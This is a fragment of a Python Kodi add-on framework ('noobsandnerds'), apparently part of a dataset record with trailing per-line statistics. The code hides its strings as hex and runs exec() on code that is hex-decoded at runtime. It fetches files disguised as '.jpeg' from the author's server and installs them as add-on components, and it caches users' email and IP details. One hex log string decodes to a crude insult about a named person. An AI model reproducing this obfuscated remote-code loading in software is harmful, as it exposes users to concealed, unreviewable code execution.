dolog(converthex('232323204661696c656420746f2072756e20636f64652c20617474656d7074696e6720746f20757365207374616e64617264206d6f6465'))\n", " try:\n", " exec(run_code)\n", " dolog(converthex('232323205375636365737366756c6c792072756e20636f6465'))\n", " except:\n", " dolog(Last_Error())\n", " try:\n", " exec(converthex(run_code))\n", " dolog(converthex('232323205375636365737366756c6c792072756e20636f6465'))\n", " except:\n", " if DEBUG == 'true':\n", " 
dialog.ok(THIS_MODULE.getLocalizedString(30980),THIS_MODULE.getLocalizedString(30981)%ADDON_ID)\n", " else:\n", " dolog(run_code)\n", "#-----------------------------------------------------------------------------\n", "# TUTORIAL #\n", "def User_Info(mode = ''):\n", " \"\"\"\n", "THIS MUST BE CALLED AT START OF CODE IF USING NOOBSANDNERDS FRAMEWORK.\n", "\n", "This is only required for developers who want to use the special\n", "noobsandnerds features, this will create a cookie file containing cached\n", "details. It's important you do this somewhere at the start of your code as\n", "it will initialise your variables on first run.~\"\"\"\n", " global main_counter\n", "\n", " if not Check_Cookie():\n", " LOGIN = Addon_Setting(addon_id=ORIG_ID,setting=converthex('6c6f67696e'))\n", " USERNAME = Addon_Setting(addon_id=ORIG_ID,setting=converthex('757365726e616d65')).replace(' ','%20') if LOGIN == 'true' else ''\n", " PASSWORD = Addon_Setting(addon_id=ORIG_ID,setting=converthex('70617373776f7264')) if LOGIN == 'true' else ''\n", " link = Open_URL('', 'post').replace('\\r','').replace('\\n','').replace('\\t','')\n", " if len(link) < 3:\n", " dialog.ok(THIS_MODULE.getLocalizedString(30833),THIS_MODULE.getLocalizedString(30834))\n", " return\n", " try:\n", " link = Encryption('d',link)\n", " except:\n", " try:\n", " link = converthex(link)\n", " except:\n", " dolog(converthex('556e61626c6520746f2072657472696576652076616c696420646174612066726f6d20736572766572'))\n", " welcomematch = re.compile('l=\"(.+?)\"').findall(link)\n", " welcometext = welcomematch[0] if (len(welcomematch) > 0) else ''\n", " ipmatch = re.compile('i=\"(.+?)\"').findall(link)\n", " ipclean = ipmatch[0] if (len(ipmatch) > 0) else '0.0.0.0'\n", " domainmatch = re.compile('d=\"(.+?)\"').findall(link)\n", " domain = domainmatch[0] if (len(domainmatch) > 0) else ''\n", " emailmatch = re.compile('e=\"(.+?)\"').findall(link)\n", " email = emailmatch[0] if (len(emailmatch) > 0) else 'Unknown'\n", " postsmatch = 
re.compile('p=\"(.+?)\"').findall(link)\n", " posts = postsmatch[0] if (len(postsmatch) > 0) else '0'\n", " unreadmatch = re.compile('u=\"(.+?)\"').findall(link)\n", " unread = unreadmatch[0] if (len(unreadmatch) > 0) else '0'\n", " messagematch = re.compile('m=\"(.+?)\"').findall(link)\n", " messages = messagematch[0] if (len(messagematch) > 0) else '0'\n", " donmatch = re.compile('t=\"(.+?)\"').findall(link)\n", " don = donmatch[0] if (len(donmatch) > 0) else ''\n", " stdmatch = re.compile('s=\"(.+?)\"').findall(link)\n", " std = stdmatch[0] if (len(stdmatch) > 0) else ''\n", " nologinmatch = re.compile('n=\"(.+?)\"').findall(link)\n", " nologin = nologinmatch[0] if (len(nologinmatch) > 0) else ''\n", " reqaddonmatch = re.compile('r=\"(.+?)\"').findall(link)\n", " reqaddons = reqaddonmatch[0] if (len(reqaddonmatch) > 0) else ''\n", "\n", " dolog(converthex('7265717569726564206164646f6e733a'))\n", "\n", "# User required re-activation on the FORUM - old FORUM user from totalxbmc\n", " if converthex('72656163746976617465') in welcometext:\n", " xbmc.log(converthex('75736572696e666f202d2072656163746976617465'))\n", " try:\n", " dolog(converthex('726561637469766174696f6e207265717569726564202d20706c656173652076697369742074686520666f72756d206174207777772e6e6f6f6273616e646e657264732e636f6d2f737570706f727420616e64206c6f67696e2e204974206c6f6f6b732061732074686f75676820796f75206861766520616e206f6c64206163636f756e742066726f6d20546f74616c58424d432064617973207768696368206a75737420726571756972656420726561637469766174696f6e2e'))\n", " os.remove(COOKIE)\n", " except:\n", " pass\n", " dialog.ok(THIS_MODULE.getLocalizedString(30831),THIS_MODULE.getLocalizedString(30832))\n", "\n", "# Currently restricted\n", " elif converthex('72657374726963746564') in welcometext:\n", " xbmc.log(converthex('75736572696e666f202d2072657374726963746564'))\n", " 
dolog(converthex('5741524e494e473a204163636f756e742063757272656e746c792072657374726963746564202d20746f6f206d616e79206c6f67696e732066726f6d206d756c7469706c65204950732e20496620796f75207468696e6b20796f75277665206163636964656e74616c6c79206c656674206c6f67696e20696e666f726d6174696f6e20696e2061206275696c64206f7220796f7572206c6f67696e20686173206265656e20636f6d70726f6d6973656420706c656173652075706461746520796f75722070617373776f7264206f6e20746865206e6f6f6273616e646e6572647320666f72756d20415341502121212054686973207265737472696374696f6e2077696c6c206265206175746f6d61746963616c6c79206c69667465642077697468696e20323420686f757273206275742077696c6c206265207265696e73746174656420617320736f6f6e206173206d756c7469706c6520495020636f6e6e656374696f6e73206172652064657465637465642e'))\n", " dialog.ok(THIS_MODULE.getLocalizedString(30829),THIS_MODULE.getLocalizedString(30830))\n", "\n", "# Wrong PASSWORD entered\n", " elif converthex('70617373776f7264') in welcometext:\n", " xbmc.log(converthex('75736572696e666f202d2077726f6e672070617373776f7264'))\n", " try:\n", " dolog(converthex('77726f6e672070617373776f7264202d20706c656173652072652d656e74657220616e642074727920616761696e'))\n", " os.remove(COOKIE)\n", " except:\n", " pass\n", " dialog.ok(THIS_MODULE.getLocalizedString(30825),THIS_MODULE.getLocalizedString(30826))\n", " Open_Settings()\n", "\n", "# Not registered and LOGIN is true\n", " elif converthex('7265676973746572') in welcometext and LOGIN == 'true':\n", " xbmc.log(converthex('75736572696e666f202d206e6f742072656769737465726564'))\n", " try:\n", " dolog(converthex('4e6f742072656769737465726564202d20706c65617365207265676973746572206174207777772e6e6f6f6273616e646e657264732e636f6d2f737570706f7274'))\n", " os.remove(COOKIE)\n", " except:\n", " pass\n", " dialog.ok(THIS_MODULE.getLocalizedString(30827),THIS_MODULE.getLocalizedString(30828))\n", " Open_Settings()\n", "\n", "# Login is true but not details are entered\n", " elif LOGIN == 'true' and USERNAME == '' and PASSWORD == '':\n", " 
xbmc.log(converthex('75736572696e666f202d206c6f67696e207472756520627574206e6f2064657461696c73'))\n", " dialog.ok(THIS_MODULE.getLocalizedString(30835),THIS_MODULE.getLocalizedString(30836))\n", " Open_Settings()\n", "\n", "# All settings checks are fine, create the COOKIE file\n", " else:\n", " xbmc.log(converthex('75736572696e666f202d20616c6c2066696e65'))\n", " dolog(converthex('416c6c2073657474696e677320636865636b206f75742066696e65202d207570646174696e6720636f6f6b69652066696c65'))\n", " writefile = open(COOKIE, mode='w+')\n", " writefile.write(Encryption('e','d=\"'+str(Timestamp())+'\"|b=\"'+domain+'\"|w=\"'+welcometext+'\"|i=\"'+ipclean+'\"|e=\"'+email+'\"|m=\"'+messages+'\"|u=\"'+unread+'\"|t=\"'+don+'\"|s=\"'+std+'\"|p=\"'+posts+'\"'+'\"|n=\"'+nologin+'\"'+'\"|a=\"'+reqaddons+'\"'))\n", " writefile.close()\n", " main_counter += 1\n", " Check_Addons(reqaddons)\n", "\n", " if main_counter < 3:\n", " xbmc.log(converthex('23232320646f696e6720766572696679'))\n", " Verify()\n", " else:\n", " dialog.ok(THIS_MODULE.getLocalizedString(30833),THIS_MODULE.getLocalizedString(30834))\n", " return\n", "\n", "# If this was called to recreate a COOKIE file just to return base url then we call that function again\n", " elif mode == 'cookie_check':\n", " Check_Cookie('base')\n", "\n", " else:\n", " Verify()\n", "#----------------------------------------------------------------\n", "def Verify(testmode = ''):\n", " \"\"\" internal command ~\"\"\"\n", " ADDON_ID = xbmcaddon.Addon().getAddonInfo('id') \n", " try:\n", " if sys.argv[1] == converthex('7465737466696c65'):\n", " ADDON_ID = ADDON_ID+'.test'\n", " except:\n", " pass\n", "# if LOGIN is true but no USERNAME and PASSWORD we open settings\n", " localfile = open(COOKIE, mode='r')\n", " content = localfile.read()\n", " content = Encryption('d',content)\n", " localfile.close()\n", " nologinmatch = re.compile('n=\"(.+?)\"').findall(content)\n", "\n", "# Set the standard logged in downloads array\n", " if len(nologinmatch)>0:\n", 
" nologindownloads = nologinmatch[0].split(',')\n", "\n", " for item in nologindownloads:\n", " if len(item)>3:\n", " download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ORIG_ID+'/'+item+'.jpeg')\n", " Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+ORIG_ID+'/'+item), DOWNLOAD_DST)\n", "\n", "# If LOGIN is true but they haven't entered details then open up settings\n", " if LOGIN == 'true' and (USERNAME == '' or PASSWORD == ''):\n", " dolog(converthex('6c6f67696e207472756520627574207573657220616e64207061737320626c616e6b'))\n", " dialog.ok(THIS_MODULE.getLocalizedString(30835),THIS_MODULE.getLocalizedString(30836))\n", " ADDON.openSettings()\n", " return\n", "\n", "# if test version enabled but LOGIN isn't tell user they need to enter credentials\n", " elif USE_TEST == 'true' and LOGIN == 'false':\n", " dolog(converthex('747279696e6720746f2072756e20746573742076657273696f6e20627574206e6f206c6f67696e20696e666f'))\n", " dialog.ok(THIS_MODULE.getLocalizedString(30961),THIS_MODULE.getLocalizedString(30962))\n", " ADDON.openSettings()\n", " return\n", "\n", "# else if LOGIN is true continue\n", " elif LOGIN == 'true':\n", " dolog(converthex('6c6f67696e20697320656e61626c6564'))\n", "\n", "# if user not previously logged in call the user_info function\n", " if not os.path.exists(COOKIE):\n", " dolog(converthex('6c6f6767696e6720696e20666f722066697273742074696d65202d20636865636b696e672063726564656e7469616c73'))\n", " User_Info()\n", "\n", "# if user previously logged in then read COOKIE file\n", " else:\n", " dolog(converthex('70726576696f75736c79206c6f6767656420696e2c20636865636b696e6720636f6f6b6965'))\n", "\n", " userdatematch = re.compile('d=\"(.+?)\"').findall(content)\n", " loginmatch = re.compile('w=\"(.+?)\"').findall(content)\n", " ipmatch = re.compile('i=\"(.+?)\"').findall(content)\n", " donmatch = re.compile('t=\"(.+?)\"').findall(content)\n", " 
stdmatch = re.compile('s=\"(.+?)\"').findall(content)\n", " basematch = re.compile('b=\"(.+?)\"').findall(content)\n", " addonsmatch = re.compile('a=\"(.+?)\"').findall(content)\n", " basedomain = basematch[0] if (len(basematch) > 0) else ''\n", " updatecheck = userdatematch[0] if (len(userdatematch) > 0) else '0'\n", " welcometext = loginmatch[0] if (len(loginmatch) > 0) else ''\n", " addons = addonsmatch[0] if (len(addonsmatch) > 0) else ''\n", " ipclean = ipmatch[0] if (len(ipmatch) > 0) else '0.0.0.0'\n", " myip = Get_IP()\n", "\n", "# Set the standard logged in downloads array\n", " if len(stdmatch)>0:\n", " stddownloads = stdmatch[0].split(',')\n", "\n", "# if user has chosen to use test version check test version is avaialble and if not already installed install it then open the settings for new addon\n", " if USE_TEST == 'true':\n", " global launch\n", " testmatch = donmatch[0].split('|')\n", " launch = testmatch[0]\n", " downloads = testmatch[1].split(',')\n", "\n", " if not ADDON_ID.endswith(converthex('2e74657374')):\n", " TestADDON_ID = ADDON_ID+converthex('2e74657374')\n", " else:\n", " TestADDON_ID = ADDON_ID\n", " ADDON_ID = ADDON_ID.replace(converthex('2e74657374'),'')\n", "\n", " if len(downloads)>0 and not os.path.exists(os.path.join(ADDONS,TestADDON_ID)):\n", " try:\n", " download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ADDON_ID+'/'+downloads[0]+'.jpeg')\n", " Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+ADDON_ID+'/'+downloads[0]), DOWNLOAD_DST)\n", " xbmc.executebuiltin('UpdateLocalAddons')\n", "\n", "# open settings for new addon, this is so the relevant settings can be opened\n", " xbmc.sleep(2000)\n", " xbmcaddon.Addon(id=TestADDON_ID).openSettings()\n", " return\n", " except:\n", " dialog.ok(THIS_MODULE.getLocalizedString(30965),THIS_MODULE.getLocalizedString(30966))\n", " return\n", " elif len(downloads)==0:\n", " 
dialog.ok(THIS_MODULE.getLocalizedString(30963),THIS_MODULE.getLocalizedString(30964))\n", " return\n", "\n", " xbmc.executebuiltin(\"XBMC.Notification(\"+THIS_MODULE.getLocalizedString(30807)+\",\"+THIS_MODULE.getLocalizedString(30808)+\",5000,\"+UPDATE_ICON+\")\")\n", "\n", "# if user needs to reactivate account remove COOKIE file and notify user they need to LOGIN at FORUM\n", " if converthex('72656163746976617465') in welcometext:\n", " dolog(converthex('23232320766572696679202d206163636f756e74206e6565647320726561637469766174696f6e'))\n", " try:\n", " os.remove(COOKIE)\n", " except:\n", " pass\n", " dialog.ok(THIS_MODULE.getLocalizedString(30831),THIS_MODULE.getLocalizedString(30832))\n", "\n", "# if user is currently restricted they cannot continue\n", " elif converthex('63757272656e746c792072657374726963746564') in welcometext:\n", " dolog(converthex('23232320766572696679202d206163636f756e742069732072657374726963746564'))\n", " dialog.ok(THIS_MODULE.getLocalizedString(30829),THIS_MODULE.getLocalizedString(30830))\n", "\n", "# if user enters wrong PASSWORD remove COOKIE and get them to re-enter details\n", " elif converthex('57726f6e672050617373776f726420456e7465726564') in welcometext:\n", " dolog(converthex('23232320766572696679202d2077726f6e672070617373776f72642c2072656d6f76696e6720636f6f6b6965'))\n", " try:\n", " os.remove(COOKIE)\n", " except:\n", " pass\n", " dialog.ok(THIS_MODULE.getLocalizedString(30825),THIS_MODULE.getLocalizedString(30826))\n", " ADDON.openSettings()\n", "\n", "# if they aren't registered remove the COOKIE file and open settings\n", " elif converthex('524547495354455220464f522046524545') in welcometext:\n", " dolog('4449584945204445414e204953204120434f434b20474f42424c4552')\n", " try:\n", " os.remove(COOKIE)\n", " except:\n", " pass\n", " dialog.ok(THIS_MODULE.getLocalizedString(30827),THIS_MODULE.getLocalizedString(30828))\n", " ADDON.openSettings()\n", "\n", "# if the date in COOKIE is not up and the ip matches the one in COOKIE we 
can continue\n", " dolog(Encryption('e', converthex('23232320766572696679202d206970636c65616e3a202573') % ipclean))\n", " dolog(Encryption('e', converthex('23232320766572696679202d206d7969703a202573') % myip))\n", "\n", " elif int(updatecheck)+1000000 > int(Timestamp()) and ipclean == myip:\n", " if USE_TEST == 'true':\n", " dolog(converthex('23232320766572696679202d207465737476657273696f6e2069732074727565'))\n", " for item in downloads:\n", " dolog(Encryption('e',converthex('23232320766572696679202d20636865636b696e673a202573') % item))\n", " download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ADDON_ID+'/'+item+'.jpeg')\n", " cleanitem = item.replace('test','')\n", " if Addon_Setting(addon_id=TestID,setting=cleanitem) == 'true':\n", " Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+TestID+'/'+item), DOWNLOAD_DST)\n", " for item in stddownloads:\n", " dolog('4449584945204445414e204953204120434f434b20474f42424c4552')\n", " download_url = (converthex('687474703a2f2f6e6f6f6273616e646e657264732e636f6d2f43505f53747566662f')+ORIG_ID+'/'+item+'.jpeg')\n", " if Addon_Setting(addon_id=ADDON,setting=item) == 'true':\n", " Check_Updates(download_url, xbmc.translatePath(converthex('7370656369616c3a2f2f70726f66696c652f6164646f6e5f646174612f')+ORIG_ID+'/'+item), DOWNLOAD_DST)\n", " xbmc.executebuiltin('Dialog.Close(busydialog)')\n", " Main('run')\n", " \n", " else:\n", " User_Info()\n", " elif LOGIN == 'false':\n", " dolog('232323206c6f67696e2064697361626c6564')\n", " Main('run')\n", "#----------------------------------------------------------------\n", "try:\n", " if sys.argv[1] == converthex('7465737466696c65') and LOGIN == 'true':\n", " if os.path.exists(os.path.join(ADDONS,ORIG_ID)) and os.path.exists(os.path.join(ADDONS,TestID)):\n", " dolog(converthex('2323232072756e6e696e67207665726966792822747275652229'))\n", " Verify('true')\n", " if sys.argv[1] == 
converthex('73657474696e6773'):\n", " if not os.path.exists(os.path.join(ADDONS,TestID)):\n", " dialog.ok(THIS_MODULE.getLocalizedString(30901),THIS_MODULE.getLocalizedString(30902))\n", " else:\n", " xbmcaddon.Addon(id=TestID).openSettings()\n", " if sys.argv[1] == converthex('636c6561725f64617461'):\n", " Clear_Data(ADDON_ID)\n", "except:\n", " pass" ]
[ 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0, 0, 0.01020408163265306, 0.010638297872340425, 0.3333333333333333, 0.01020408163265306, 0.010416666666666666, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.125, 0, 0, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0.034482758620689655, 0, 0.047619047619047616, 0, 0, 0, 0, 0.2, 0, 0.125, 0, 0, 0, 0, 0, 0, 0.05263157894736842, 0.125, 0, 0, 0, 0.058823529411764705, 0, 0.03571428571428571, 0, 0.06896551724137931, 0, 0.037037037037037035, 0, 0.037037037037037035, 0.04081632653061224, 0.04, 0.044444444444444446, 0.033707865168539325, 0.04081632653061224, 0.030927835051546393, 0.041666666666666664, 0.05042016806722689, 0.05714285714285714, 0.05504587155963303, 0.024793388429752067, 0.047058823529411764, 0.047058823529411764, 0.0364963503649635, 0.03389830508474576, 0.047058823529411764, 0.04040404040404041, 0.039603960396039604, 0.04597701149425287, 0.025974025974025976, 0, 0.05405405405405406, 0.044444444444444446, 0, 0.0625, 0.09090909090909091, 0, 0.08695652173913043, 0.08695652173913043, 0.043478260869565216, 0, 0.058823529411764705, 0, 0, 0, 0, 0, 0, 0, 0, 0.03488372093023256, 0.02531645569620253, 0.015151515151515152, 0, 0.08108108108108109, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0.03773584905660377, 0.015151515151515152, 0.038461538461538464, 0, 0, 0, 0, 0.03496503496503497, 0.015151515151515152, 0.10344827586206896, 0, 0, 0.03488372093023256, 0, 0, 0.02702702702702703, 0, 0, 0.05714285714285714, 0.04, 0, 0, 0.01694915254237288, 0.01694915254237288, 0.01694915254237288, 0, 0.022988505747126436, 0.015625, 0, 0.014925373134328358, 0, 0.046875, 0.0449438202247191, 0.03278688524590164, 0.03278688524590164, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 
0, 0, 0, 0, 0, 0, 0, 0, 0, 0.015151515151515152, 0.019230769230769232, 0, 0, 0, 0.015384615384615385, 0, 0, 0, 0, 0, 0.020202020202020204, 0.047619047619047616, 0, 0.046511627906976744, 0, 0, 0, 0, 0, 0, 0, 0, 0.0625, 0, 0.08333333333333333, 0, 0.015151515151515152, 0.02564102564102564, 0, 0, 0.05128205128205128, 0, 0, 0, 0, 0, 0.02857142857142857, 0.02702702702702703, 0, 0.047619047619047616, 0.047619047619047616, 0, 0.05, 0, 0, 0, 0, 0, 0.030303030303030304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.015151515151515152, 0.07142857142857142, 0, 0.024509803921568627, 0.037037037037037035, 0.017241379310344827, 0.01639344262295082, 0, 0.015151515151515152, 0, 0.08108108108108109, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009259259259259259, 0.2, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0, 0, 0, 0, 0, 0, 0, 0, 0.02127659574468085, 0.024390243902439025, 0, 0.00819672131147541, 0.0625, 0.006944444444444444, 0, 0, 0.011363636363636364, 0.05, 0, 0, 0, 0.010869565217391304, 0.041666666666666664, 0, 0.025, 0, 0, 0.012658227848101266, 0, 0.11538461538461539, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0.03571428571428571, 0.03305785123966942, 0.06315789473684211, 0, 0.020202020202020204, 0, 0, 0.044444444444444446, 0.0625, 0, 0.024390243902439025, 0.05, 0.008333333333333333, 0.016129032258064516, 0.013333333333333334, 0.016129032258064516, 0.013888888888888888, 0.016129032258064516, 0.0136986301369863, 0.016129032258064516, 0.01282051282051282, 0.016129032258064516, 0.013888888888888888, 0.016129032258064516, 0.013513513513513514, 0.016129032258064516, 0.013157894736842105, 0.016129032258064516, 0.014925373134328358, 0.016129032258064516, 0.014925373134328358, 0.016129032258064516, 0.013333333333333334, 0, 0.012987012987012988, 0, 0, 0, 0, 0, 0, 0, 0.0024271844660194173, 0, 0.05, 0, 0.020202020202020204, 0, 0, 0, 0, 0.001282051282051282, 0.020202020202020204, 0, 0, 0, 
0.011494252873563218, 0, 0.007692307692307693, 0, 0.05, 0, 0.020202020202020204, 0, 0, 0, 0, 0.011494252873563218, 0, 0.005952380952380952, 0, 0.05, 0, 0.020202020202020204, 0, 0, 0, 0, 0.009174311926605505, 0.020202020202020204, 0, 0, 0, 0, 0, 0.007462686567164179, 0, 0.008032128514056224, 0, 0, 0, 0, 0, 0, 0, 0, 0.019417475728155338, 0, 0, 0.009615384615384616, 0, 0, 0, 0, 0, 0.015151515151515152, 0.1111111111111111, 0, 0.018867924528301886, 0, 0, 0.047619047619047616, 0.08333333333333333, 0, 0, 0.020833333333333332, 0.023809523809523808, 0.04081632653061224, 0, 0.015151515151515152, 0, 0, 0.03571428571428571, 0, 0, 0, 0.03571428571428571, 0.0070921985815602835, 0.005917159763313609, 0, 0, 0, 0.01020408163265306, 0.021052631578947368, 0, 0, 0, 0.012048192771084338, 0, 0.00847457627118644, 0.021052631578947368, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.007692307692307693, 0, 0, 0, 0, 0.009259259259259259, 0, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0.012658227848101266, 0.022727272727272728, 0.024691358024691357, 0.024096385542168676, 0.024390243902439025, 0, 0, 0, 0.03125, 0, 0, 0.006666666666666667, 0, 0, 0.01639344262295082, 0.0196078431372549, 0.016129032258064516, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0.031578947368421054, 0, 0.006329113924050633, 0.005376344086021506, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0.018018018018018018, 0, 0.025, 0.018691588785046728, 0, 0, 0.006289308176100629, 0, 0.009900990099009901, 0, 0.008620689655172414, 0, 0, 0.041666666666666664, 0, 0.019417475728155338, 0, 0, 0.011363636363636364, 0.009433962264150943, 0.019417475728155338, 0, 0, 0.010869565217391304, 0.007936507936507936, 0, 0, 0.041666666666666664, 0, 0.019417475728155338, 0, 0, 0, 0.012195121951219513, 0.012195121951219513, 0, 0, 0.041666666666666664, 0, 0.019417475728155338, 0, 0, 0.011494252873563218, 0.008849557522123894, 0.009615384615384616, 0, 0.012195121951219513, 
0, 0.009433962264150943, 0, 0.01680672268907563, 0.006666666666666667, 0.016666666666666666, 0.022988505747126436, 0.005555555555555556, 0, 0.011627906976744186, 0.006896551724137931, 0.012987012987012988, 0.005649717514124294, 0, 0, 0.07692307692307693, 0, 0, 0, 0, 0, 0.015151515151515152, 0.2, 0, 0.02857142857142857, 0.011627906976744186, 0, 0, 0.016666666666666666, 0.020202020202020204, 0, 0, 0, 0, 0.125, 0.125 ]
646
0.013466
false